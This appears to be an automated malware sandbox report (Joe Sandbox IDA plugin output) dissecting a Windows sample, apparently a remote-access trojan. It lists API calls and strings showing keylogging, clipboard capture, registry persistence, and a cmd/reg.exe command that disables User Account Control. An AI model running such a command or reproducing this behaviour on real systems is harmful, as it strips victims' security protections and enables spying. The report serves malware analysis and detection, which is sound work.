                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$h'X
                                                  • API String ID: 2506810119-3952049375
                                                  • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                  • Instruction ID: 4586c06f5089a32e0a27d225e7dc2ef765d2d79e054ce2780aa4c4bdbf091298
                                                  • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                  • Instruction Fuzzy Hash: 12319371A80218AFDB33EF99DC84A9EBBFEEF85320B104066ED04A7210D7719E41CB50
                                                  Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00433519: RtlEnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                    • Part of subcall function 00433519: RtlLeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                  • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                    • Part of subcall function 004334CF: RtlEnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                    • Part of subcall function 004334CF: RtlLeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                  • API String ID: 2974294136-753205382
                                                  • Opcode ID: 27177344db3f65c8a7f19ff2323e9f3f7e3a193126b178a4bad76e333529366b
                                                  • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                  • Opcode Fuzzy Hash: 27177344db3f65c8a7f19ff2323e9f3f7e3a193126b178a4bad76e333529366b
                                                  • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                  Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                  • wsprintfW.USER32 ref: 0040A905
                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(00000000,?,00000000,0040A91C,00000000), ref: 00409D84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                  • API String ID: 1497725170-248792730
                                                  • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                  • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                  • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                  • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                  Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                  • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: `AG
                                                  • API String ID: 1958988193-3058481221
                                                  • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                  • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                  • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                  • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                  Function 020F9FFE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,020FA0D6), ref: 020FA034
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,020FA0D6), ref: 020FA043
                                                  • Sleep.KERNEL32(00002710,?,?,?,020FA0D6), ref: 020FA070
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,020FA0D6), ref: 020FA077
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: `AG
                                                  • API String ID: 1958988193-3058481221
                                                  • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                  • Instruction ID: 85a091870c34b81a14558e658f1e8dd7d0423adcaeae007477e0606e9053cfda
                                                  • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                  • Instruction Fuzzy Hash: 06113D303803406EDBF1A724F88CA3F3B96AB89315F440528F38942D92C765A8C4D769
                                                  Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                  • GetLastError.KERNEL32 ref: 0041CA91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                  • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                  Function 0210CC86 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0210CCD3
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0210CCEE
                                                  • GetLastError.KERNEL32 ref: 0210CCF8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction ID: ec2689304769dc44e7400c558afef8ec8856332e52b8e2bf17b40b15b91643e1
                                                  • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction Fuzzy Hash: DB0129B1D1421EAB8B00DFD9DDC4AEFBBBDBE49255B50462AF400B2140E7B04A448FA0
                                                  Function 02137477 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0213741E,?,00000000,00000000,00000000,?,0213774A,00000006,0045D330), ref: 021374A9
                                                  • GetLastError.KERNEL32(?,0213741E,?,00000000,00000000,00000000,?,0213774A,00000006,0045D330,0045D328,0045D330,00000000,00000364,?,021371F8), ref: 021374B5
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0213741E,?,00000000,00000000,00000000,?,0213774A,00000006,0045D330,0045D328,0045D330,00000000), ref: 021374C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID: #v
                                                  • API String ID: 3177248105-554117064
                                                  • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction ID: fc285bfbec7bc75e7f670cb664d47da4892a2071e61de883d815e56f6500d545
                                                  • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction Fuzzy Hash: 4401FC72A55327AFC7324A78BC44E56BFD9AF05BB2B114930F91AD31C1D720E801CAE4
                                                  Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                  • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                  • CloseHandle.KERNEL32(?), ref: 00406A14
                                                  Strings
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                  • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                  • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                  • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                  Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                  • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                  Function 021029DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 021029E6
                                                  • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,020FE832,pth_unenc,004742E0), ref: 02102A14
                                                  • RegCloseKey.ADVAPI32(?,?,020FE832,pth_unenc,004742E0), ref: 02102A1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc$BG
                                                  • API String ID: 1818849710-2233081382
                                                  • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                  • Instruction ID: 4a58e285af4cf6e091ca1e0c9c141e40e66ce85f2ce2d800e637db0901a7a040
                                                  • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                  • Instruction Fuzzy Hash: A6F06D72580218BFDF509BA4ED59FEE376DEB01B80F004524FA02AA4A1EB71DA04DA50
                                                  Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                  • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                  Function 00401430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCursorInfo$User32.dll$`#v
                                                  • API String ID: 1646373207-1032071883
                                                  • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                  • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                  • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                  • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                  Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                  • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                  • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                  • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                  Function 021303D1 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2c0e9d55fcd13551ec2678028d06ddb1c515a5452d77a18986bab3fa9fe77ab
                                                  • Instruction ID: 93be63204a45b977d8dc8ffeacd8501e610d2eaef30f09056aa47a9d88cdab11
                                                  • Opcode Fuzzy Hash: e2c0e9d55fcd13551ec2678028d06ddb1c515a5452d77a18986bab3fa9fe77ab
                                                  • Instruction Fuzzy Hash: 8871A472985216DFDB22CF58C884ABFBBFBEF49364F144229E85167190D770D941CBA0
                                                  Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                  • RtlAllocateHeap.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                  • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
                                                  • String ID:
                                                  • API String ID: 4001361727-0
                                                  • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                  • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                  Function 021341E2 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                  • Instruction ID: 2e6d0f4258cd6385e5cb4e2ce218f67d39edb0e939d775f9ba110e64380e9ea7
                                                  • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                  • Instruction Fuzzy Hash: 6751D171A80208AFDB22DF69E841B6A77F6FF48724F140569E809E7250E732E905CB80
                                                  Function 02138276 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 021382E0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 02138358
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 02138385
                                                  • _free.LIBCMT ref: 021382CE
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 0213849A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction ID: 22607af0df60f3cc70266885c28db723fb4937eb5f9938dcc17b14f9cb21cc32
                                                  • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction Fuzzy Hash: 9F511971940219EFDB25EF79DC809AEB7BEEF40360B11067AF458932A0E730D945CB54
                                                  Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                    • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                    • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
